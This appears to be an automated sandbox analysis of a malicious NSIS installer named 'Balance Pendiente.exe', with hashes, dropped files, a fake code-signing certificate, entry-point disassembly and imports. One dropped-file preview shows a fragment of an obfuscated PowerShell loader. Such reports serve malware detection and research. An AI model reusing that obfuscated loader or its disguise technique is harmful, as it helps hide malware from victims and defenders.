                                                                                                                                                                  • Filename: hnTW5HdWvY.exe, Detection: malicious, Browse
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L....f.R...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text...J........................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):507280
                                                                                                                                                                  Entropy (8bit):7.58580269013346
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:yQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZx:cEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2p
                                                                                                                                                                  MD5:E70E71A31781B44F850A39693784CE74
                                                                                                                                                                  SHA1:CE8CF2DC1B30D5D6870CC3D374C15E1005FDC879
                                                                                                                                                                  SHA-256:A02B56B4C74424B72AE21D4737E822653E68B9762E1AEB313D81BD45ABCE39E7
                                                                                                                                                                  SHA-512:2A7994CEC6638F7FF523358E7DF0BFDDAD0F2ABAEF89E598455E9F0B7A44009E139AC9F9AFD7AC38377ED302727C5C75322327B8FABF0B450835CDBB5C52A9A8
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                  • Antivirus: Virustotal, Detection: 44%, Browse
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........0.......p....@..........................................................................s.......`..P............................................................................p...............................text...jZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata... ...@...........................rsrc...P....`.......v..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:Generic INItialization configuration [registrar aabredden]
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):357
                                                                                                                                                                  Entropy (8bit):4.322293998459369
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:PLZOEA1KHK56RTYPCl0ic0BTgcNDuARfKQfOwVBbvmF00aLdT4F+6/EB+OHeWhkb:P8HnPel/PMARfKnwVBbvmAhT4F+6TIkb
                                                                                                                                                                  MD5:ACED15FD55D311D663ECC7B5F386B8E2
                                                                                                                                                                  SHA1:A7F36FD33206209CB0E5E39643EC8C6773D5ED3B
                                                                                                                                                                  SHA-256:16FDDF0D82AA1263194FE7C92459A6CF21DDDB1F1AE5A4E5A099865DB126614F
                                                                                                                                                                  SHA-512:7F27A00EDA246719E5F8FA521AC9499002DFDB36F6E661E13797C863520D84D14F43B5F717B176BBBEFCB4B62B671A14292C59DF288C55628CA08868BBCCFBD3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[bloodstained initialdeterminanten]..unprescinded produktionsforholds identific dysurias biblioteksbgernes textman kaldte spotlightet archearl,sofus unvessel souffleer cementblanders stoneweed rufe trningsdragternes genitivisk bartizaned....[registrar aabredden]..;teardowns batchkrselens unform gradgrind,eksekveringens afskrifters secretors printerporte..
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (3143), with CRLF, LF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60368
                                                                                                                                                                  Entropy (8bit):5.280991252251336
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:IuWZnBGyJTf6U1uxBx174Nsp/0PjUt5hYlH:ULvTf/1uHNcj6XYt
                                                                                                                                                                  MD5:798E71F2FB7AECCBF532D4B9C7484B56
                                                                                                                                                                  SHA1:D22784524AC6412395F51A3FD3FE0CFBA04F034C
                                                                                                                                                                  SHA-256:1669D04C0289873AA79409AC3522A90CE116740F52C11EB8833AAF5C8908ACB8
                                                                                                                                                                  SHA-512:29F868A51AC1B4C25A4A7D1FAD093E6FCCC3ADC762F8FA791C8E728AAF16A26CE0E43CDF45F955D0152D94CCFF514776426BFB9A088CEBF77EF9521A642606BF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:$Styningens=$Urlighedens;........$Habitudes = @'.Sprea.Vandg$DodoeGLibe nUnde oForeasEkatatProwli.raskkS rueeDandyr Nephe N.nmnDendrs Read=Proto$RenmoU trv nTrededAndreiLarg.sTemmeo AnthbP leoeT akeyPolypeHalvtd Auto;Komma.MyopifJingpuHujennBatracSkunktRheumiBaskeoO erlnDistr PerfeT owariEts.rc RoaduFalbynTvegeaTiggenArbej Basid( Smil$.okkaSAcciap MediiHuls.rKiggei odpotSwou uOpgavsFejribov.rdeN tras PhrekDs ghaBortetPereinBakunisenilnElusigprotoeTakkenManufsUnpar,s.ogh$Bi.esPMdedalAalekuBehavsHeterkKen avPy oma acetm Pl vpu impeScatbrOsteafD komeSub rkDav,ntsubpru SupimSkambmSvbere XenatFoelesIsabe)Dom.e ebel{ akhi.Taage.Woodw$ChemoS B fapCitrooBrneetCon,ep ChlorGrapiiHypassAscideSk ver BrnesCompe orbe(RegnsKunthouPr.cerSikkes Realu yldsBillapTol,alHovedaAsiarnLic,teFr nzrHjor.nUpwreeCouris Vand Misti'Mo.onOVenstv.rpineTankbrKval.l Hero$GlassUBlushnBllenm esos, KrontUngdySPakk B etsbeRemonv C lcgUddate Bogtp Lesq GifteaK aftcHexachLicheiA tifiUhyreLG nneaTegnkmPhra bRepli ForhurOe
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 79x629, components 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):7357
                                                                                                                                                                  Entropy (8bit):7.91945978739656
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:LqBD2cMKYD6M3QJxtEns0OU16nK3HXJ2UgU:eBDnM6MgDtEEUknqYUL
                                                                                                                                                                  MD5:F32B2F6007A74312B5F0CB1AA5B26680
                                                                                                                                                                  SHA1:BC3DC7EB50EFA53CE2FC46A32C5F995048BD85B3
                                                                                                                                                                  SHA-256:2CB79365771956854ACEAD63102B019737F5C99A5A10DA94D2969638CC23E825
                                                                                                                                                                  SHA-512:EBE3120E79D07F3D1D775940ADF00E099AFD6F3273D49C2D600FEE1ACE2C175C9E01CBE9EB3D83EF7D033F129C5D562983F19B1D7CD327763A92E9A246EB94F3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......u.O.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...J).8V.".. ..)...OQM......8P).sH..K.p...L...M..M..N..S.U......G.,..T.9....u4........H......R.LZ.U.X.*E...*..Gc.|\.P.EI.sY.sh....QH..@.[.Q..#.z..R.9.ED.jQZ"Y".*5.2...TT.c..T.1..+.....E.S.sR6*.....).s.R.F.(.Q,.:..8..T.*.E... .PU..T3D8.tc.9W.O.~Q.RP...-5....IzT.Q..TV..L.1VTT1....Q...E.1S....4.c.SR..).?tj.).......8..Z....8."N-{T.*$...R0.,.*......}.Q".>.Sq.
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):338276
                                                                                                                                                                  Entropy (8bit):7.671083634160716
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:WWxwim+hZhU4Cb/9U5usu4LX4Ev0P+sDBG6IzhV8ulhplMjNzxU9l:WWxrPhxY9su+IBGsDI9qEQxUH
                                                                                                                                                                  MD5:A4DD91D5ACFA3D8154510A16A27792DF
                                                                                                                                                                  SHA1:7F797BEECC8609A7B617A7CCD6BA8A335D475A47
                                                                                                                                                                  SHA-256:5AE90EE62220502C1041B177854398C94B9F42F6115CE6FCA120B7C0702C0286
                                                                                                                                                                  SHA-512:8F119081CF9625F036AC4783A7D127D25E8BF82BC6FEBE804EDAC2D18B71B9E85AB2C26CB04AA1A28A47CC1D49BD0676D486FEA917CA872B7C2E43A6AF889C07
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..........cc.11.:...................................................................;;....}}...........iiii...bbb.......E...............................R.......w..+........x.{{{.......................nn.......Z..............u..6...........................@........r.oo..................|........L................W..""......................a.............. ...............eeee......m........555.....................................X........z......R.$.h...............................J...............................................N.......z...{......................y...........mm...................||......//..YYYY..e.....d.j....................a..........o..............WW.//....WWW...sss.%%.'........?.......WWW...................................u.....eee............nn....mm...........ddd.....0............>>.............}}.\\.>>..........11...M.....bbbb..1.........................{.....'....FF...........................................t.........9.......j.............OO.......................k.
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):188
                                                                                                                                                                  Entropy (8bit):4.482002609682535
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:jNgLDK9OujIcBAVar8kQWgQQXTzMTBWAQ2qQJCTgLck/xLCmSoTKA9jsqdn:WEOnwfoOVm0tnNwTOdg295dn
                                                                                                                                                                  MD5:2B51E420AA9188A74DB9D853C1225B5C
                                                                                                                                                                  SHA1:B1AA913BBE9C576F1C7917AE2E18F4F5C4B54164
                                                                                                                                                                  SHA-256:FA760065782306B4B9E082086166D25EADA402A3332C771C48F4EDE9D5DC7E53
                                                                                                                                                                  SHA-512:574581B87211289CC809F0BF97E968E5BC070C95B20E92ADC4315404A3E632754291BBE3B3AF1894441855BD25C797FF52ADF968DC0A73F710F199017CAF37E6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:benittas thirstier inductometer.Halvlngde forlyder roth..Cicuta barbaren udsugningsanlggets,privatisere rationalizing protogyny udmntningsprofil gyrolith volkswagen..[tyndtarmes sstykke]..
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:Generic INItialization configuration [FJORTENAARSFDSELSDAGES UDSTDELSERNES]
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):279
                                                                                                                                                                  Entropy (8bit):4.994626166298632
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:2/r0IwOQPFeBmRaaBO/XJLgDj/GZowKblJBQVAL6Ab9xu+b1:2A9OQYYJO/XuGZjKJJiVu6AbT5R
                                                                                                                                                                  MD5:6620E9C5C35F1FEAAFC525A49FF31080
                                                                                                                                                                  SHA1:969AB64F04BCDCAB9088F1F2FA6A8209DB33E8FD
                                                                                                                                                                  SHA-256:FCD285BFF12244DA3CF356243BEACEB8DB8B2868320D371D1059408AD02A0CAA
                                                                                                                                                                  SHA-512:A3238FD4843C3407CD07C014444F2557D7064F53A074F58BE97230A7CC7D81E0C7D09DD25B9110C5568466E2F9AA10EB11129ED143E07F63763EB5FE3DA75ED9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[PALEOMAGNETISM CLADOCEROUS]..praseodymium undeftly vestenvindes.Nskesedlers forgrundsfarves spandaueren skrmmevaabnets....;toyos oddesund apostrofe fremfrelses.Opsamlingsbeholdere alkoholdebut unadvertised suggestioneres overprovide......[FJORTENAARSFDSELSDAGES UDSTDELSERNES]..
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 424x693, components 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32639
                                                                                                                                                                  Entropy (8bit):7.9475019669336495
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:6+UnjpGM4h/Q0kf7jWCXOi/vWYjc/Gv33xxMatfqxi/fftvoEP:6+UjpB4K0kjjWKOi/vWYjOUHXtfqAXvP
                                                                                                                                                                  MD5:86647E5BC7C82F155C5CB0EC05F40E9F
                                                                                                                                                                  SHA1:E0946F26733AA05FCEAE067377622C083AF88C8D
                                                                                                                                                                  SHA-256:6D1974E15C49647F2BA907D7D233CB04D2F9D9C77CFB6B4255B577FE95D54B19
                                                                                                                                                                  SHA-512:7C812D119382C9135195DDD18106FC6B465982D36C7815680C52DE2C0A40DC8E569FFBF32E87AF8BA10A71670A01CAB30D0D36CE49DB599473EC10CDACEFF992
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........H.O..,Q.1..x...t.S.:P8<S...Hb.M(...t..x.R..........4.(..\....J^{R.....N....H...c.>..l.(f.@.u..$&$.U.Q.8..Lt..I..L.%ii...m..N..........R.sU..Ez..L..<S.q.V..s...=..)2^....0.<6{T.8..?.p.Tc..NOZ....?<sP.....O....H....j }..G. '\dsN.....H.}MIC..=...ii.....(.{.....Z..t4.(.v}...n....1E<c.z@8.v2i..8......zR......i......m...q.!.(?.?g.....M..t...E+
                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                  Entropy (8bit):7.58580269013346
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                                                                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                  File name:Balance Pendiente.exe
                                                                                                                                                                  File size:507'280 bytes
                                                                                                                                                                  MD5:e70e71a31781b44f850a39693784ce74
                                                                                                                                                                  SHA1:ce8cf2dc1b30d5d6870cc3d374c15e1005fdc879
                                                                                                                                                                  SHA256:a02b56b4c74424b72ae21d4737e822653e68b9762e1aeb313d81bd45abce39e7
                                                                                                                                                                  SHA512:2a7994cec6638f7ff523358e7df0bfddad0f2abaef89e598455e9f0b7a44009e139ac9f9afd7ac38377ed302727c5c75322327b8fabf0b450835cdbb5c52a9a8
                                                                                                                                                                  SSDEEP:12288:yQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZx:cEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2p
                                                                                                                                                                  TLSH:33B4F1A37286E5E7F4560CF4CC299AF993A2ED01D9D85503F184BF2F387366245250AF
                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........0.......p....@
                                                                                                                                                                  Icon Hash:371f9d96cb0d1703
                                                                                                                                                                  Entrypoint:0x4030b8
                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                  Time Stamp:0x52BA66A9 [Wed Dec 25 05:01:29 2013 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                  File Version Major:4
                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                  Import Hash:e160ef8e55bb9d162da4e266afd9eef3
                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                  Signature Issuer:CN=Breweries, E=Skrmblomstede@Tredjeprmier.Sh, O=Breweries, L=Somersworth, OU="Tyktarmsoperations Kaalhoved tilblivelsens ", S=New Hampshire, C=US
                                                                                                                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                  Error Number:-2146762487
                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                  • 06/05/2024 11:26:53 06/05/2025 11:26:53
                                                                                                                                                                  Subject Chain
                                                                                                                                                                  • CN=Breweries, E=Skrmblomstede@Tredjeprmier.Sh, O=Breweries, L=Somersworth, OU="Tyktarmsoperations Kaalhoved tilblivelsens ", S=New Hampshire, C=US
                                                                                                                                                                  Version:3
                                                                                                                                                                  Thumbprint MD5:92807D7374421D79A823FA7ACA6FF4C6
                                                                                                                                                                  Thumbprint SHA-1:05F5583BAAEA1B3C4E6C4B87EF108D1468F3E327
                                                                                                                                                                  Thumbprint SHA-256:E8C65A4CB80B655AEF4C0D07A3D407B6265C0EC80F62EE79AC5291A245D3AEA2
                                                                                                                                                                  Serial:391A08F4CFA8FACE743EC806DF49200A45DD1E7D
                                                                                                                                                                  Instruction
                                                                                                                                                                  sub esp, 00000184h
                                                                                                                                                                  push ebx
                                                                                                                                                                  push ebp
                                                                                                                                                                  push esi
                                                                                                                                                                  xor ebx, ebx
                                                                                                                                                                  push edi
                                                                                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                                                                                  mov dword ptr [esp+10h], 00409190h
                                                                                                                                                                  mov dword ptr [esp+20h], ebx
                                                                                                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                                                                                                  call dword ptr [00407034h]
                                                                                                                                                                  push 00008001h
                                                                                                                                                                  call dword ptr [0040711Ch]
                                                                                                                                                                  push ebx
                                                                                                                                                                  call dword ptr [0040728Ch]
                                                                                                                                                                  push 00000008h
                                                                                                                                                                  mov dword ptr [00423778h], eax
                                                                                                                                                                  call 00007F773490ADCAh
                                                                                                                                                                  mov dword ptr [004236C4h], eax
                                                                                                                                                                  push ebx
                                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                                  push 00000160h
                                                                                                                                                                  push eax
                                                                                                                                                                  push ebx
                                                                                                                                                                  push 0041EC80h
                                                                                                                                                                  call dword ptr [00407164h]
                                                                                                                                                                  push 00409180h
                                                                                                                                                                  push 00422EC0h
                                                                                                                                                                  call 00007F773490AA74h
                                                                                                                                                                  call dword ptr [00407120h]
                                                                                                                                                                  mov ebp, 00429000h
                                                                                                                                                                  push eax
                                                                                                                                                                  push ebp
                                                                                                                                                                  call 00007F773490AA62h
                                                                                                                                                                  push ebx
                                                                                                                                                                  call dword ptr [00407118h]
                                                                                                                                                                  cmp byte ptr [00429000h], 00000022h
                                                                                                                                                                  mov dword ptr [004236C0h], eax
                                                                                                                                                                  mov eax, ebp
                                                                                                                                                                  jne 00007F773490803Ch
                                                                                                                                                                  mov byte ptr [esp+14h], 00000022h
                                                                                                                                                                  mov eax, 00429001h
                                                                                                                                                                  push dword ptr [esp+14h]
                                                                                                                                                                  push eax
                                                                                                                                                                  call 00007F773490A4F2h
                                                                                                                                                                  push eax
                                                                                                                                                                  call dword ptr [00407220h]
                                                                                                                                                                  mov dword ptr [esp+1Ch], eax
                                                                                                                                                                  jmp 00007F77349080F5h
                                                                                                                                                                  cmp cl, 00000020h
                                                                                                                                                                  jne 00007F7734908038h
                                                                                                                                                                  inc eax
                                                                                                                                                                  cmp byte ptr [eax], 00000020h
                                                                                                                                                                  je 00007F773490802Ch
                                                                                                                                                                  Programming Language:
                                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000x18a50.rsrc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x7b6100x780
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                  .text0x10000x5a6a0x5c008781c451557a4626018483faabe438d0False0.6614724864130435data6.417713695663469IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .rdata0x70000x11ce0x1200640f709ec19b4ed0455a4c64e5934d5eFalse0.4520399305555556OpenPGP Secret Key5.23558258677739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .data0x90000x1a7b80x400c9a433d4fe67308d6a5942cfb667cbe7False0.5986328125data4.862130355383113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .ndata0x240000x120000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .rsrc0x360000x18a500x18c00ae1da6d52c6b9db5a72bcee2295c6945False0.3393604008838384data4.6330392279203245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                  RT_ICON0x364480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.2523660238968414
                                                                                                                                                                  RT_ICON0x46c700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.4220954356846473
                                                                                                                                                                  RT_ICON0x492180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.49343339587242024
                                                                                                                                                                  RT_ICON0x4a2c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.5876865671641791
                                                                                                                                                                  RT_ICON0x4b1680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.5450819672131147
                                                                                                                                                                  RT_ICON0x4baf00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.7319494584837545
                                                                                                                                                                  RT_ICON0x4c3980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.7811059907834101
                                                                                                                                                                  RT_ICON0x4ca600x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.47804878048780486
                                                                                                                                                                  RT_ICON0x4d0c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.7095375722543352
                                                                                                                                                                  RT_ICON0x4d6300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6879432624113475
                                                                                                                                                                  RT_ICON0x4da980x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.5551075268817204
                                                                                                                                                                  RT_ICON0x4dd800x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 0EnglishUnited States0.6086065573770492
                                                                                                                                                                  RT_ICON0x4df680x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.6993243243243243
                                                                                                                                                                  RT_DIALOG0x4e0900x100dataEnglishUnited States0.5234375
                                                                                                                                                                  RT_DIALOG0x4e1900x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                  RT_DIALOG0x4e2b00xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                  RT_DIALOG0x4e3780x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                  RT_GROUP_ICON0x4e3d80xbcdataEnglishUnited States0.601063829787234
                                                                                                                                                                  RT_VERSION0x4e4980x2b0dataEnglishUnited States0.5058139534883721
                                                                                                                                                                  RT_MANIFEST0x4e7480x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                                                                                                                  DLLImport
                                                                                                                                                                  KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                                                                                                                                                  USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                                                                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
